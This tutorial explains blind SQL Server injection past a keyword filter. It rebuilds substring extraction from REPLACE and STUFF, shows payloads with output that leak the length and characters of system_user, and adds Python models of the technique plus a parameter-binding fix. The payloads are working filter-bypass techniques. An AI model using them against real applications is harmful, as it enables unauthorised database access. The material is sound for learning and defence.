Introduction to SQL Server Injection

SQL Server Smart Functions

This problem came up while working on a project for the company: the target was injectable, but a filter blocked each of the following keywords, checked separately:

and, or, left, right, substring
  • The site filters the commonly used string truncation functions LEFT, RIGHT and SUBSTRING, so a substitute for them is needed.

Related Functions

Replace Function

Definition: REPLACE() returns the original string with every occurrence of a specified string value replaced by another string value.

Example

# replace every occurrence of 'a' with '1'
1> select REPLACE('abcdef', 'a', '1');
2> go
+-------+
| |
+-------+
| 1bcdef |
+-------+
(1 rows affected)
# replace every occurrence of 'b' with '1'
1> select REPLACE('abcdef', 'b', '1');
2> go
+-------+
| |
+-------+
| a1cdef |
+-------+
(1 rows affected)
# replace every occurrence of 'ab' with '1'
1> select REPLACE('abcdef', 'ab', '1');
2> go
+-------+
| |
+-------+
| 1cdef |
+-------+
(1 rows affected)

STUFF Function

STUFF(string, start, length, replace_with) deletes `length` characters from `string` starting at position `start` and inserts `replace_with` at that position. It is not a substring function, but we can use it as one.

Example

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
| field1 |
+--------------------------------+
| abcde |
+--------------------------------+
1 row in set (0.00 sec)

Example

After looking at the examples of the two functions above, you may be able to guess how I will proceed here!
Yes, I want to combine them to replace the string truncation functions.

# the value to extract through the injection (system_user)
1> select system_user;
2> go
+----+
| |
+----+
| sa |
+----+
(1 rows affected)
# test data
1> select * from users;
2> go
+----+-------------+------------+
| id | username | password |
+----+-------------+------------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
| 3 | testaa | 4444 |
+----+-------------+------------+
(3 rows affected)
1> select * from users where id=2;
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)

Obtaining the Length of system_user

You can obtain the length of a value in this way.

Wrong guess

1> select * from users where id=2-REPLACE(STUFF(system_user,10,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)
1> select * from users where id=2-REPLACE(STUFF(system_user,3,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,2,0,''),system_user,0);
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 2 | test-user-02 | 234567 |
+--------+------------+-----------+
(1 rows affected)

STUFF returns NULL as soon as the start position is greater than the length of the string, so 2 - NULL is NULL and no row matches. The row for id = 2 is returned with start position 2 but not with start position 3, so the length of system_user is 2.
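To see exactly why the boundary between a returned row and no row lands on the length, here is a small Python model of the STUFF and REPLACE semantics that matter, with the post's own probes run through it. This is an added example written for this page, not code from the post; the functions are assumptions that model T-SQL behaviour (NULL from STUFF when the start position exceeds the string length, implicit string-to-int conversion in `2 - <string>`, and the post's three-row users table), not the engine itself. The point for a reviewer is that nothing in the payload names a filtered function: the substring behaviour is rebuilt from two permitted functions and the oracle is the engine's own implicit conversion, so a keyword blocklist has nothing to match.

```python
from typing import Optional

# The post's sample users table, by id (constructed).
USERS = {1: "test-user-01", 2: "test-user-02", 3: "testaa"}


def sql_stuff(s: Optional[str], start: int, length: int, insert: str) -> Optional[str]:
    """Model of T-SQL STUFF(character_expression, start, length, replaceWith_expression).

    Positions are 1-based. Returns None (SQL NULL) when start is 0 or negative, when
    length is negative, or when start is past the end of the string; a length that
    runs past the end simply deletes to the end. (Assumed model of the documented rules.)
    """
    if s is None or start < 1 or length < 0 or start > len(s):
        return None
    return s[:start - 1] + insert + s[start - 1 + length:]


def sql_replace(s: Optional[str], pattern: str, replacement) -> Optional[str]:
    """Model of T-SQL REPLACE(): every occurrence of `pattern` becomes `replacement`.

    A non-string replacement (the post passes the integer 0) is implicitly converted to
    its string form, as the engine does. This model is case-sensitive; the default SQL
    Server collation is case-insensitive, which is ignored here.
    """
    if s is None:
        return None
    return s.replace(pattern, str(replacement))


def run_where_id(expr: Optional[str]) -> list:
    """Ids returned by `select * from users where id = 2 - <expr>` when expr is a string.

    int outranks nvarchar in T-SQL data type precedence, so the string is converted to
    int: a numeric string becomes a number, NULL makes the whole comparison NULL (no row
    can match), and anything else raises the conversion error the post shows.
    """
    if expr is None:
        return []
    try:
        n = int(expr)
    except ValueError:
        raise ValueError(f"Failed converting nvarchar value '{expr}' to data type int.")
    return [row_id for row_id in USERS if row_id == 2 - n]


def length_by_probe(value: str) -> int:
    """Length recovery as the post describes it: STUFF(value, n, 0, '') returns the value
    unchanged while n <= LEN(value) and NULL once n exceeds it, so the first n that
    yields no row is LEN + 1."""
    n = 1
    while run_where_id(sql_replace(sql_stuff(value, n, 0, ""), value, 0)) == [2]:
        n += 1
    return n - 1


if __name__ == "__main__":
    # The post's two length probes against system_user = 'sa'.
    print(run_where_id(sql_replace(sql_stuff("sa", 3, 0, ""), "sa", 0)))  # []
    print(run_where_id(sql_replace(sql_stuff("sa", 2, 0, ""), "sa", 0)))  # [2]
    print(length_by_probe("sa"))  # 2
```

Running the post's character probe through the same model shows the third outcome: `sql_replace(sql_stuff("sa", 1, 1, ""), "b", 0)` is the string `'a'`, which `run_where_id` cannot convert, reproducing the `22018` conversion error rather than an empty result.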

Second Character of system_user

Wrong guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'b',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'a' to data type int.

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'a',0);
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)

First Character of system_user

The second character is already known to be a, so comparing the whole value against 'fa' and 'sa' tests the first character.

Wrong guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'fa',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'o' to data type int.

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'sa',0);
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)
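The fix for the application side is not a longer blocklist. Below is an added example, written for this page and not the post's code, that puts the filter-plus-concatenation pattern beside a bound, validated parameter. It uses Python's built-in sqlite3 module so it runs offline; since SQLite has no STUFF, the constructed payload uses SQLite's replace() to build the same `2-<string expression>` shape the post uses. The blocklist, the table contents, the payload and the function names are all assumptions.

```python
import re
import sqlite3

# The keyword filter the post describes, checked one word at a time (assumed form).
BLOCKLIST = ("and", "or", "left", "right", "substring")

# Constructed payload in the post's shape (`2-<string function>`), using SQLite's
# replace() because SQLite has no STUFF: replace('x','x',0) yields '0', and 2-'0'
# evaluates to 2, so the row with id 2 is selected without naming a filtered word.
PAYLOAD = "2-replace('x','x',0)"


def build_db() -> sqlite3.Connection:
    """Constructed in-memory copy of the post's users table (sample data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, username text, password text)")
    con.executemany(
        "insert into users values (?, ?, ?)",
        [(1, "test-user-01", "123456"), (2, "test-user-02", "234567"), (3, "testaa", "4444")],
    )
    return con


def passes_blocklist(user_input: str) -> bool:
    """True when none of the listed words appears as a whole word (case-insensitive)."""
    lowered = user_input.lower()
    return not any(re.search(rf"\b{word}\b", lowered) for word in BLOCKLIST)


def lookup_vulnerable(con: sqlite3.Connection, user_input: str) -> list:
    """'Before': blocklist plus string concatenation. Input that avoids the five words is
    spliced into the statement and evaluated by the engine as SQL."""
    if not passes_blocklist(user_input):
        return []
    return con.execute(f"select id, username from users where id={user_input}").fetchall()


def lookup_bound(con: sqlite3.Connection, user_input: str) -> list:
    """Parameter binding alone: the input is a value to compare, never SQL to parse, so an
    expression inside it is compared as text against the integer id and matches nothing."""
    return con.execute("select id, username from users where id=?", (user_input,)).fetchall()


def lookup_hardened(con: sqlite3.Connection, user_input: str) -> list:
    """'After': allowlist-validate the parameter as an integer, then bind it. Rejecting
    non-numeric input up front turns a silent miss into an explicit error, which is also
    the natural place to log the attempt."""
    if not re.fullmatch(r"[0-9]{1,9}", user_input):
        raise ValueError("id must be a positive integer")
    return con.execute("select id, username from users where id=?", (int(user_input),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(passes_blocklist(PAYLOAD))          # True: the filter has nothing to match
    print(lookup_vulnerable(db, PAYLOAD))     # [(2, 'test-user-02')]: the expression ran
    print(lookup_bound(db, PAYLOAD))          # []: compared as a value, not evaluated
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

Binding alone already neutralises the expression, as `lookup_bound` shows; the integer allowlist in `lookup_hardened` is defence in depth that gives the application a clean rejection point instead of an empty result, and the same validate-then-bind pattern applies unchanged to a SQL Server driver such as pyodbc.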

TutorialBoy